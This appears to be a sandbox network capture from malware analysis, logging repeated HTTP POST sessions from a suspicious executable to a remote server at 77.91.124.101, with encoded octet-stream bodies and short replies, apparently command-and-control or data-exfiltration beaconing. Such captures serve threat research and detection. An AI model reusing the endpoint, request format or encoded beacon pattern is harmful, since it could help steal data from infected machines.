Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:38.006661892 CET	213	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:38.204606056 CET	214	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:38.204896927 CET	215	OUT	Data Raw: 52 58 58 50 5e 5e 5a 5d 5d 57 55 57 55 5d 57 5a 50 5e 58 41 56 54 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXXP^^Z]]WUWU]WZP^XAVTW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(.+&U)'[.$6#*5+3.S$>&3.R..?+]/&G''^)+
Nov 21, 2023 04:47:38.409367085 CET	218	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:38 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 5b 32 2c 3f 03 37 55 3f 53 3c 2a 25 52 2d 07 3e 41 3f 33 22 07 25 2d 16 5f 27 39 3e 0b 3f 11 01 03 27 17 23 0e 23 50 23 05 2a 1a 21 5a 0c 1d 26 5b 21 5e 3f 1e 3f 3d 24 13 28 13 2c 5c 25 1f 27 17 3c 00 27 53 21 30 23 10 25 33 37 08 2c 01 25 5f 2d 01 31 1b 26 5a 21 01 37 07 23 5f 0c 14 27 19 22 31 0d 5b 23 30 22 56 23 37 33 01 37 27 33 53 24 2d 0e 1e 26 16 2d 1a 2b 16 2b 0d 32 0e 24 50 26 3a 01 1d 25 07 01 51 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "[2,?7U?S<%R->A?3"%-_'9>?'##P#!Z&[!^??=$(,\%'<'S!0#%37,%_-1&Z!7#_'"1[#0"V#737'3S$-&-++2$P&:%Q<&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	77.91.124.101	80	192.168.2.5	49730	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:38.006661892 CET	213	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:38.204606056 CET	214	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:38.204896927 CET	215	OUT	Data Raw: 52 58 58 50 5e 5e 5a 5d 5d 57 55 57 55 5d 57 5a 50 5e 58 41 56 54 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXXP^^Z]]WUWU]WZP^XAVTW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(.+&U)'[.$6#*5+3.S$>&3.R..?+]/&G''^)+
Nov 21, 2023 04:47:38.409367085 CET	218	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:38 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 5b 32 2c 3f 03 37 55 3f 53 3c 2a 25 52 2d 07 3e 41 3f 33 22 07 25 2d 16 5f 27 39 3e 0b 3f 11 01 03 27 17 23 0e 23 50 23 05 2a 1a 21 5a 0c 1d 26 5b 21 5e 3f 1e 3f 3d 24 13 28 13 2c 5c 25 1f 27 17 3c 00 27 53 21 30 23 10 25 33 37 08 2c 01 25 5f 2d 01 31 1b 26 5a 21 01 37 07 23 5f 0c 14 27 19 22 31 0d 5b 23 30 22 56 23 37 33 01 37 27 33 53 24 2d 0e 1e 26 16 2d 1a 2b 16 2b 0d 32 0e 24 50 26 3a 01 1d 25 07 01 51 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "[2,?7U?S<%R->A?3"%-_'9>?'##P#!Z&[!^??=$(,\%'<'S!0#%37,%_-1&Z!7#_'"1[#0"V#737'3S$-&-++2$P&:%Q<&T+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	77.91.124.101	80	192.168.2.5	49731	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:38.151434898 CET	214	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:38.349040985 CET	215	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:38.349267006 CET	218	OUT	Data Raw: 52 5a 58 59 5b 5c 5a 58 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXY[\ZX]WUWUZWVP]XEV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')5<)?;57=X(0=32R$3..]&?,#/&G''^)7
Nov 21, 2023 04:47:38.555543900 CET	219	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49731	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:38.151434898 CET	214	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:38.349040985 CET	215	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:38.349267006 CET	218	OUT	Data Raw: 52 5a 58 59 5b 5c 5a 58 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXY[\ZX]WUWUZWVP]XEV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')5<)?;57=X(0=32R$3..]&?,#/&G''^)7
Nov 21, 2023 04:47:38.555543900 CET	219	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	77.91.124.101	80	192.168.2.5	49714	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:27.412916899 CET	150	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:27.609544992 CET	151	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:27.609765053 CET	153	OUT	Data Raw: 57 5e 58 5a 5b 5c 5a 51 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^XZ[\ZQ]WUWU[WTP^X@VQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')=8"*3$8$&Z#^(3!3=$V98&(,,&G''^)3
Nov 21, 2023 04:47:27.814687014 CET	154	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49714	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:27.412916899 CET	150	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:27.609544992 CET	151	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:27.609765053 CET	153	OUT	Data Raw: 57 5e 58 5a 5b 5c 5a 51 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^XZ[\ZQ]WUWU[WTP^X@VQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')=8"*3$8$&Z#^(3!3=$V98&(,,&G''^)3
Nov 21, 2023 04:47:27.814687014 CET	154	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	49732	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:38.877762079 CET	220	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:39.075643063 CET	220	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:39.075918913 CET	223	OUT	Data Raw: 57 5a 58 5e 5b 5e 5f 5e 5d 57 55 57 55 56 57 50 50 5f 58 41 56 52 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WZX^[^_^]WUWUVWPP_XAVRW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X>(1X=+=<8!4\&( =3>>P$31:>?7Y;&G''^)
Nov 21, 2023 04:47:39.280512094 CET	223	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	77.91.124.101	80	192.168.2.5	49732	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:38.877762079 CET	220	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:39.075643063 CET	220	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:39.075918913 CET	223	OUT	Data Raw: 57 5a 58 5e 5b 5e 5f 5e 5d 57 55 57 55 56 57 50 50 5f 58 41 56 52 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WZX^[^_^]WUWUVWPP_XAVRW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X>(1X=+=<8!4\&( =3>>P$31:>?7Y;&G''^)
Nov 21, 2023 04:47:39.280512094 CET	223	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49733	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:39.598589897 CET	224	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:39.795681000 CET	224	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:39.795901060 CET	227	OUT	Data Raw: 57 59 58 5f 5b 59 5a 5b 5d 57 55 57 55 5d 57 54 50 5b 58 44 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYX_[YZ[]WUWU]WTP[XDV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(<U)0#\8$#%+ 93>2'T9+\>,']/&G''^)+
Nov 21, 2023 04:47:39.999308109 CET	227	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	77.91.124.101	80	192.168.2.5	49733	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:39.598589897 CET	224	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:39.795681000 CET	224	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:39.795901060 CET	227	OUT	Data Raw: 57 59 58 5f 5b 59 5a 5b 5d 57 55 57 55 5d 57 54 50 5b 58 44 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYX_[YZ[]WUWU]WTP[XDV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(<U)0#\8$#%+ 93>2'T9+\>,']/&G''^)+
Nov 21, 2023 04:47:39.999308109 CET	227	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	77.91.124.101	80	192.168.2.5	49734	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:40.322233915 CET	228	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:40.520041943 CET	228	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:40.520492077 CET	231	OUT	Data Raw: 57 5e 5d 5e 5b 5b 5a 5b 5d 57 55 57 55 5b 57 5b 50 5d 58 40 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^]^[[Z[]WUWU[W[P]X@VWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=Z+89>#?]/Z#=)#.3-P$:8%<?#^8&G''^)3
Nov 21, 2023 04:47:40.724601984 CET	231	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49734	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:40.322233915 CET	228	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:40.520041943 CET	228	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:40.520492077 CET	231	OUT	Data Raw: 57 5e 5d 5e 5b 5b 5a 5b 5d 57 55 57 55 5b 57 5b 50 5d 58 40 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^]^[[Z[]WUWU[W[P]X@VWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=Z+89>#?]/Z#=)#.3-P$:8%<?#^8&G''^)3
Nov 21, 2023 04:47:40.724601984 CET	231	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	77.91.124.101	80	192.168.2.5	49735	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:41.051342010 CET	232	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:41.248904943 CET	232	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:41.249264956 CET	235	OUT	Data Raw: 57 58 58 5e 5e 5a 5a 59 5d 57 55 57 55 5c 57 52 50 5c 58 48 56 5f 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXX^^ZZY]WUWU\WRP\XHV_W[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=)_=+:W=#8,Z 99Y(3&-2W00::;=? ,&G''^)/
Nov 21, 2023 04:47:41.453973055 CET	235	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49735	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:41.051342010 CET	232	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:41.248904943 CET	232	IN	HTTP/1.1 100 Continue
